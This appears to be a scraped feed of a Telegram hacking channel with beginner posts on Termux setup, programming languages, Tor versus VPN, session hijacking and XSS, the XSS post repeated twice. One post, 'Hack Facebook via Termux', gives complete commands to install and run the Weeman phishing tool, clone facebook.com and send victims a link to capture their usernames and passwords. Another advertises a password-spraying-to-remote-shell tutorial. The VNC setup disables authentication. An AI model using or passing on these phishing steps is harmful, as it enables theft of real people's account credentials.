UNDERCODE SECURITY
226 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘full Install graphical interface for Termux original methodes
#forbeginers

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣get termux playstore- get lastest version

2️⃣Update the source, fonts, interface, etc. There are very detailed and detailed tutorials online, you can search for a search, there are many, because there is no way to say too much in a hurry.

3️⃣How install desktop for termux ?

> Install various packages

1) Openbox (window manager)
Openbox is a lightweight window manager running on GNU/Linux with X11. Openbox uses the GPL protocol to open source code and is free and free software. Openbox is based on Blackbox, which is considered one of the original window managers (ie, the code itself). [From Baidu Encyclopedia]

2) PyPanel is a lightweight panel/task bar written in Python and C for the X11 window manager. It can be easily customized to match any desktop theme or taste. PyPanel works with EWMH compatible WMS (Openbox, PekWM, FVWM, etc.). And it is distributed under the GNU General Public License v2.

3) xorg-xsetroot Description: A classic X utility that sets the root window background to a given mode or color

4) PyXDG is a
unique python terminal emulator for accessing freedesktop.org

5) Install tigervnc (you can also install other remote desktops, take tigervnc as an example) to realize remote desktop control

> pkg install tigervnc

> vi startvnc

6️⃣Write a configuration file :

#!/bin/bash -e
export DISPLAY=:10
Xvnc --SecurityTypes=None $DISPLAY &
sleep 1s
openbox-session
xsetroot -solid gray
pypanel
aterm
startxfce4

7️⃣chmod +x startvnc

8️⃣./startvnc

You can connect to the remote desktop boringly! ! ! !
Sprinkle flowers Sprinkle flowers ~~
Click Android vnc and
enter localhost:5910

ENJOYβ€οΈπŸ‘πŸ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST HACKING PROGRAMMING LANGUAGES:
#ForBeginers

1. Python

Python is one of the more commonly used programming languages ​​for developers. Many large enterprises choose Python for product development, such as: NASA, Google, Instagram, Spotify, Uber, Netflix, etc., and it is very wonderful that both beginners and professionals like Python, so it can be seen Popularity. If you are a technical professional in the big data profession, then Python is arguably the most suitable.

2. R

R is a language that can be easily connected to a database management system (DBMS), but in fact it does not provide any spreadsheet data view. However, the larger feature of R language is that it provides a variety of graphical functions for data representation, such as bar charts, pie charts, time series, point charts, 3D surfaces, image charts, maps, scatter charts, and so on. The R language can help users easily customize graphics and develop novel graphics with characteristics.

3. Java

After Java appeared, it was widely known for its versatility in data science and technology. Moreover, the open source framework Hadoop HDFS for processing and storing big data applications has been written entirely in Java. Java is also widely used to build various ETL applications, such as Apache, Apache Kafka, and Apache Camel. These applications are used to run data extraction, data conversion, and loading in a big data environment.

4. Scala

Scala is an open source high-level programming language, currently mainly used in the financial industry. A relatively large feature of Scala is its importance in ensuring the availability of big data. In short, Apache Spark is a cluster computing framework for big data applications. Big data practitioners generally need to have extensive knowledge and operational experience related to Scala.

5. Kotlin

Kotlin is a very good Android application development language that can run on the JVM. To some extent, it overcomes some of the shortcomings of Java and provides many modern functions. The main feature of Kotlin is its language design, which provides excellent pointers, security, type inference and other functions. The huge ecosystem of existing Java libraries is available for Kotlin, because Kotlin also runs in the JVM.

6. Go

The Go programming language has great concurrency support. Go uses "Goroutine" (lightweight green thread) and "Channel" for messaging. It does not provide "shared memory" concurrency through threads and locks, because in this case, programming will be more difficult. But it provides CSP-based messaging concurrency.

Go's favorite feature is simplicity. Novice developers can use it to write efficient code in just a few days, which is actually very similar to Python. Moreover, some large-scale cloud-native projects are also written in Go.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Password Spraying Outlook Web Access_ Remote Shell.pdf
617.7 KB
A well written tutorial- #forbeginers Password Spraying Outlook Web Access_ Remote Shell
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What are all termux addons ?
#ForBeginers

<> Addons
Some extra features available. You can add them by installing addons:

1) Termux:API – Access Android and Chrome hardware features.

2) Termux:Boot – Run script(s) when your device boots.

3) Termux:Float – Run in a floating window.

4) Termux:Styling – Have color schemes and powerline-ready fonts customize the appearance of the terminal.

5) Termux:Task – An easy way to call Termux executables from Tasker and compatible apps.

6) Termux:Widget – Start small scriptlets from the home screen.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Many Hackers asking what is difference between termux & Cmd or terminal apk on android & termux so popular
#ForBeginers

> forget about python and scripting let's take a look to termux features not avaible for Terminal apk app :))

1) Secure. Access remote servers using the ssh client from OpenSSH. Termux combines standard packages with accurate terminal emulation in a beautiful open source solution.

2) Feature packed. Take your pick between Bash, fish or Zsh and nano, Emacs or Vim. Grep through your SMS inbox.

3) Access API endpoints with curl and use rsync to store backups of your contact list on a remote server.

4) Customizable. Install what you want through the APT package management system known from Debian and Ubuntu GNU/Linux. Why not start with installing Git and syncing your dotfiles?

5) Explorable. Have you ever sat on a bus and wondered exactly which arguments tar accepts? Packages available in Termux are the same as those on Mac and Linux – install man pages on your phone and read them in one session while experimenting with them in another.

6) With batteries included. Can you imagine a more powerful yet elegant pocket calculator than a readline-powered Python console? Up-to-date versions of Perl, Python, Ruby and Node.js are all available.

7) Ready to scale up. Connect a Bluetooth keyboard and hook up your device to an external display if you need to – It supports keyboard shortcuts and has full mouse support.

8) Tinkerable. Develop by compiling C files with Clang and build your own projects with CMake and pkg-config. Both GDB and strace are available if you get stuck and need to debug.


enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β€”termux features
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Decryption and encryption for beginers :
#forbeginers

1) Encryption and decryption of software is a fascinating field of research, which can be closely integrated with almost any computer technology-cryptography, programming languages, operating systems, and data structures. Without encryption technology,

2) any network security is empty talk, and the application of encryption runs through the entire network security learning process.

3) Let's first understand the program in the computer. Programs written in high-level languages will be compiled into machine language and executed on the CPU, such as Visual C++. Since machine language and assembly language have a one-to-one correspondence, machine language can be converted into assembly language. This process is called disassembly.
The assembly language may be more readable, so you can analyze the program flow and analyze its functions. This process is decryption (commonly known as cracking). In other words, the basis of decryption is built on the level of assembly language, so friends who want to get involved in this field must learn assembly language well.

4) After you have learned the assembly, it is recommended to master Win32 programming.Learning to decrypt and encrypt is very tiring, it takes a lot of time, and often hits the wall. It is very common to make no progress for three to five days. There is no secret other than diligence + perseverance. But mastering this technology can improve one's own debugging skills through tracking software, understand others' program ideas, and write better programs.

E N J O Y β€οΈπŸ‘πŸ»
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#forbeginers Google AdSense allows modification of Western Union’s phonetic name

> In
the Google AdSense account settings, our pinyin name is always set upside down for us. According to the custom of foreign countries, the surname is always placed after the name, so we always hit a wall when we withdraw money in Western Union. According to many people's feedback, GG finally made today's decision to allow the modification of Western Union's phonetic name.

> The following is the content announced on the GG official website: Since the opening of Western Union, many publishers need to write us an email to modify the pinyin name to receive payment. In order to facilitate the smooth withdrawal of funds from publishers, we are happy to inform you that now you can directly modify the pinyin name in your account!

The modification steps are very simple:

1️⃣ Log in to your AdSense account and click on the My Account link.

2️⃣ Click the edit link next to the payment details.

3️⃣Select Set up Western Union Quick Cash and click Continue.
Then you will see the page to modify the pinyin name: you only need to fill in the pinyin of your name in the corresponding box, the case of the pinyin has no effect, but do not add spaces between the names.

@undercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘another methode #forbeginers how can we protect the security of shared folders in the local area network? This requires the following means:

When setting access permissions for shared folders, set important shared files as read-only.

1) Most of the time, users only need to view or copy the shared file, and often do not directly modify the shared folder. However, for convenience, some employees directly share a folder and file in a readable and writable manner. This is very dangerous.

2) On the one hand, these unrestricted shared file homes and shared files have become carriers of virus transmission. During my work, I discovered that some users do not have permission restrictions when sharing files. After some time, I went to look at the shared file again, and found that there were traces of viruses or Trojan horses in some shared files or shared folders.

3) It turns out that because this shared folder has write permissions, how other users open this file, if there is a virus or Trojan horse in this computer, it will be infected to this shared folder. In this way, other computers that access this shared folder are also caught. It can be seen that the shared folders without protection measures and the shared files inside have become a good carrier for virus transmission.

4) On the other hand, when the data is changed illegally, it is difficult to find out who is playing the prank. Although the relevant log information can be used to query who has accessed the shared file and whether any changes have been made. However, based on this information alone, it is impossible to know what changes the user made to this shared folder.

5) Sometimes, when we open a shared file, we accidentally press a space bar or a character key, accidentally overwrite a word, etc. These situations are often encountered in actual work. Sometimes, even if he finds the responsible person, he doesn't know what has been changed. Therefore, when the shared file is set to be writable, it is difficult to prevent employees from changing it intentionally or unintentionally.

6) Third, if files are shared in a writable way, the unity of data may not be guaranteed. For example, the personnel department has shared an attendance file in a readable and writable manner. At this time, if the financial department modifies this document, the personnel department does not know. Because the financial staff may forget to tell the personnel department, at this time, the data between the two departments will be inconsistent, which may cause some unnecessary troubles.

>Moreover, since there is no relevant evidence, no one can tell who is right and who is wrong.

7) In order to solve these problems, I suggest that corporate users, when sharing folders, it is best to set the permissions of the folder to read-only. If this shared folder sometimes needs to save files in this folder by other users, it cannot be set as read-only. Then we can also set the files in the shared folder as read-only.

> In this case, because the folders are read-only, viruses and Trojan horses cannot infect these folders, thereby avoiding being a source of contamination for spreading viruses; moreover, it can also prevent unauthorized changes by users, which may lead to inconsistent data. and many more.

@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘TOR VS VPN, VPN AND TOR, WHICH ONE IS BETTER :
#forBeginers

If your goal is to encrypt the transmitted data so that your Internet provider could not analyze it, then both Tor and your VPN, which you yourself set up , can come up with ! I would not recommend using any third-party VPNs, since their owner can see all the transmitted traffic + client IP (that is, your IP address). If you use a third-party VPN service, then you are guaranteed to get a spyware who, at a minimum, also knows your real IP address! If this is a paid VPN, then it is absolutely not suitable for anonymity, since the VPN service does not only know your IP and has access to all transmitted data, then it knows who you are by your payment details.

1) The self-configured OpenVPN allows you to encrypt the transmitted traffic and integrate your devices into a virtual private network. You can also hide your real IP address and bypass site blocking. But for anonymity, this option is not suitable, because for the operation of OpenVPN you need to rent a VPS, for which you have to pay. Although if you use cryptocurrency or other anonymous methods for payment, OpenVPN will help you to be anonymous.

2) Using a single proxy has the same disadvantages as a VPN: the eavesdropper + proxy service knows your real IP address. An additional drawback in the absence of encryption is that your ISP can still analyze your traffic and even block access to websites.

3) The situation with IP concealment improves if a proxy chain is used, because (depending on the settings), each next proxy knows the IP address of the previous node (always) and the IP address of 1 node before the previous one (sometimes). If we consider that traffic is not encrypted at any stage, and a certain part of public proxies is just honeypots (intended for the exploitation of users), then the proxy option is not the best way to ensure anonymity.

enjoyβ€οΈπŸ‘πŸ»
#wikiresources
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Session Hijacking Attacks :
#forbeginers

- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.

- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the user’s browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.

S p e c i f i c a l l y :

1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.

2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.

M E T H O D E S :

There are several different ways to compromise a session token:


1) By predicting a weak session token

2) Through session sniffing

3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)

4) Through man-in-the-middle (MITM) attacks (phishing, etc.)

ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK FACEBOOK VIA TERMUX :
#ForBeginers :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) apt update && upgrade

Now give permission to Termux to access your memory
So type below command

2) termux-setup-storage

Then type this command to install python2

3) pkg install python2

During installation of python2 you will be asked " Termux will use some space"

4) Just type Y and hit enter
Now you have to install git, for that type this command

5) pkg install git

After successfully installing git, type below command to
6) install Weeman

7) git clone https://github.com/evait-security/weeman.git

After that type this command

8) cd weeman && ls

Now you have to type below command to run Weeman on Python

9) python2 weeman.py

Now you will see the Weeman user interface, its time to set all the necessary command

firstly you have to find your IP address, it is important so that you can find your IP address through termux

Just open a new tab on termux and type below command to see your IP

10) ifconfig

11) Now you got your IP address, now type below commands to get started

set url http://facebook.com
set action_url https://facebook.com
set port 8080

Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.

12) How To Hack Facebook Using Termux (Weeman)

If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command

run

Setting up weeman in termux

that's all you have successfully executed all the commands to hack Facebook

Now you have to share your IP with your victim to get his username and password

12) so send a link to your victim as http://Your_IP:8080

Eg: http://127.0.0.1:8080


#forbeginers
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?


1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.

2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.

3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. β€œYou can develop interactive features, games or add additional features to better promote your products,” says Domantas Gudelyauskas, marketing manager for the Zyro project.

4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.

πŸ¦‘How does cross-site scripting work?

Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?


1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.

2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.

3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. β€œYou can develop interactive features, games or add additional features to better promote your products,” says Domantas Gudelyauskas, marketing manager for the Zyro project.

4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.

πŸ¦‘How does cross-site scripting work?

Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁